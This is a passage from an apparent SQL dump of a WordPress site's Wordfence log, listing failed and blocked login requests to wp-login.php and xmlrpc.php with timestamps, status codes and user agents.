Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9808,0.000000,1630393847.684155,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(9809,0.000000,1630393849.971784,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(9810,0.000000,1630393851.172229,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(9811,0.000000,1630393853.337169,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(9812,0.000000,1630393854.566186,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(9813,0.000000,1630393855.866587,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(9814,0.000000,1630393862.057176,'\0\0\0\0\0\0\0\0\0\0����C',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(9815,0.000000,1630393880.890279,'\0\0\0\0\0\0\0\0\0\0����e�',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(9816,0.000000,1630393886.581920,'\0\0\0\0\0\0\0\0\0\0��Y���',0,200,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','loginFailInvalidUsername',NULL,NULL),(9817,0.000000,1630393890.583271,'\0\0\0\0\0\0\0\0\0\0����e',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9818,0.000000,1630393897.464508,'\0\0\0\0\0\0\0\0\0\0��mFd\"',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9819,0.000000,1630393898.892198,'\0\0\0\0\0\0\0\0\0\0��|��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9820,0.000000,1630393902.404024,'\0\0\0\0\0\0\0\0\0\0����e',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','https://dogstardesign.co.uk/wp-login.php','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9821,0.000000,1630394082.830442,'\0\0\0\0\0\0\0\0\0\0��^�N�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9822,0.000000,1630394248.762854,'\0\0\0\0\0\0\0\0\0\0��կ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9823,0.000000,1630394386.604701,'\0\0\0\0\0\0\0\0\0\0��-M�.',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9824,0.000000,1630394548.934364,'\0\0\0\0\0\0\0\0\0\0���7pm',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9825,0.000000,1630394705.298969,'\0\0\0\0\0\0\0\0\0\0��[�ȷ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9826,0.000000,1630394852.331079,'\0\0\0\0\0\0\0\0\0\0���>n�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9827,0.000000,1630395074.550754,'\0\0\0\0\0\0\0\0\0\0���A�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9828,0.000000,1630395087.671337,'\0\0\0\0\0\0\0\0\0\0��6$��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9829,0.000000,1630395311.026049,'\0\0\0\0\0\0\0\0\0\0���Ҝ4',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9830,0.000000,1630395564.615301,'\0\0\0\0\0\0\0\0\0\0��C�2',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(9831,0.000000,1630395850.229810,'\0\0\0\0\0\0\0\0\0\0��ٶ��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9832,0.000000,1630396084.512713,'\0\0\0\0\0\0\0\0\0\0�����Q',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9833,0.000000,1630396362.009909,'\0\0\0\0\0\0\0\0\0\0��/\0$',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9834,0.000000,1630396529.086340,'\0\0\0\0\0\0\0\0\0\0���贮',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9835,0.000000,1630396612.988772,'\0\0\0\0\0\0\0\0\0\0��3O',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9836,0.000000,1630396728.105348,'\0\0\0\0\0\0\0\0\0\0���c]�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9837,0.000000,1630396892.908368,'\0\0\0\0\0\0\0\0\0\0��ν�V',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9838,0.000000,1630397061.638309,'\0\0\0\0\0\0\0\0\0\0��]qo�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9839,0.000000,1630397204.618050,'\0\0\0\0\0\0\0\0\0\0��-=��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9840,0.000000,1630397353.463567,'\0\0\0\0\0\0\0\0\0\0���26',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9841,0.000000,1630397517.367771,'\0\0\0\0\0\0\0\0\0\0��|(��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9842,0.000000,1630397698.100482,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9843,0.000000,1630398463.365308,'\0\0\0\0\0\0\0\0\0\0��ϴ�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9844,0.000000,1630400002.514413,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9845,0.000000,1630400776.411605,'\0\0\0\0\0\0\0\0\0\0���Dd@',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9846,0.000000,1630401540.691851,'\0\0\0\0\0\0\0\0\0\0����g$',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9847,0.000000,1630402309.285960,'\0\0\0\0\0\0\0\0\0\0���a�V',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9848,0.000000,1630403857.302810,'\0\0\0\0\0\0\0\0\0\0���?g�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9849,0.000000,1630404647.489587,'\0\0\0\0\0\0\0\0\0\0���]�S',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9850,0.000000,1630405542.205440,'\0\0\0\0\0\0\0\0\0\0��-wQ�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9851,0.000000,1630406230.314735,'\0\0\0\0\0\0\0\0\0\0���A�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9852,0.000000,1630407023.266048,'\0\0\0\0\0\0\0\0\0\0���E��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9853,0.000000,1630407815.901638,'\0\0\0\0\0\0\0\0\0\0���n\\�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9854,0.000000,1630408534.489488,'\0\0\0\0\0\0\0\0\0\0�����\\',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9855,1630408576.827212,1630408576.706000,'\0\0\0\0\0\0\0\0\0\0�����\\',0,503,0,0,0,'https://dogstardesign.co.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(9856,0.000000,1630408610.854539,'\0\0\0\0\0\0\0\0\0\0���]�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9857,0.000000,1630409399.162132,'\0\0\0\0\0\0\0\0\0\0��3Kȷ',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9858,0.000000,1630410205.205170,'\0\0\0\0\0\0\0\0\0\0��_կ�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9859,0.000000,1630411813.380805,'\0\0\0\0\0\0\0\0\0\0����\"E',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9860,0.000000,1630412622.902355,'\0\0\0\0\0\0\0\0\0\0��X&�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9861,0.000000,1630413418.134184,'\0\0\0\0\0\0\0\0\0\0���X2�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9862,0.000000,1630413800.601133,'\0\0\0\0\0\0\0\0\0\0��-���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Opera/9.80 (Windows NT 6.1; WOW64; MRA 6.0 (build 6081)) Presto/2.12.388 Version/12.13','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9863,0.000000,1630414231.419450,'\0\0\0\0\0\0\0\0\0\0��:��^',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9864,0.000000,1630415046.286782,'\0\0\0\0\0\0\0\0\0\0�����[',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9865,0.000000,1630415863.207443,'\0\0\0\0\0\0\0\0\0\0���F��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9866,0.000000,1630416683.691714,'\0\0\0\0\0\0\0\0\0\0��\"���',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9867,0.000000,1630417497.801002,'\0\0\0\0\0\0\0\0\0\0���!',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9868,0.000000,1630418327.010140,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9869,0.000000,1630419156.292964,'\0\0\0\0\0\0\0\0\0\0���7o',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9870,0.000000,1630419989.678796,'\0\0\0\0\0\0\0\0\0\0���;�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9871,0.000000,1630420831.150460,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9872,0.000000,1630421669.686481,'\0\0\0\0\0\0\0\0\0\0��g�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9873,0.000000,1630422522.253060,'\0\0\0\0\0\0\0\0\0\0��h�\Z',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9874,0.000000,1630423408.933345,'\0\0\0\0\0\0\0\0\0\0��.��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9875,0.000000,1630424320.745600,'\0\0\0\0\0\0\0\0\0\0���;�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9876,0.000000,1630425225.065311,'\0\0\0\0\0\0\0\0\0\0��#��C',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9877,0.000000,1630426150.042864,'\0\0\0\0\0\0\0\0\0\0��:��^',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9878,0.000000,1630426993.078758,'\0\0\0\0\0\0\0\0\0\0���\rKz',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9879,0.000000,1630428745.708531,'\0\0\0\0\0\0\0\0\0\0���]�S',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9880,0.000000,1630429630.454772,'\0\0\0\0\0\0\0\0\0\0��.�yo',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9881,0.000000,1630430549.152066,'\0\0\0\0\0\0\0\0\0\0��QEˣ',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9882,0.000000,1630431402.448980,'\0\0\0\0\0\0\0\0\0\0��(z��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9883,0.000000,1630431487.483890,'\0\0\0\0\0\0\0\0\0\0����{�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9884,0.000000,1630432255.180854,'\0\0\0\0\0\0\0\0\0\0��QEˣ',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9885,0.000000,1630433118.375893,'\0\0\0\0\0\0\0\0\0\0����^�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9886,0.000000,1630434002.870609,'\0\0\0\0\0\0\0\0\0\0�����^',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9887,0.000000,1630434873.710573,'\0\0\0\0\0\0\0\0\0\0��ν',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9888,0.000000,1630435735.655995,'\0\0\0\0\0\0\0\0\0\0��Ue�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9889,0.000000,1630436598.493986,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9890,0.000000,1630437457.711509,'\0\0\0\0\0\0\0\0\0\0���AL&',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9891,0.000000,1630438322.977541,'\0\0\0\0\0\0\0\0\0\0���X2�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9892,0.000000,1630439187.363462,'\0\0\0\0\0\0\0\0\0\0����E.',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9893,0.000000,1630440050.075835,'\0\0\0\0\0\0\0\0\0\0��- 9',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9894,0.000000,1630440914.938778,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9895,0.000000,1630441781.194450,'\0\0\0\0\0\0\0\0\0\0���Avv',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 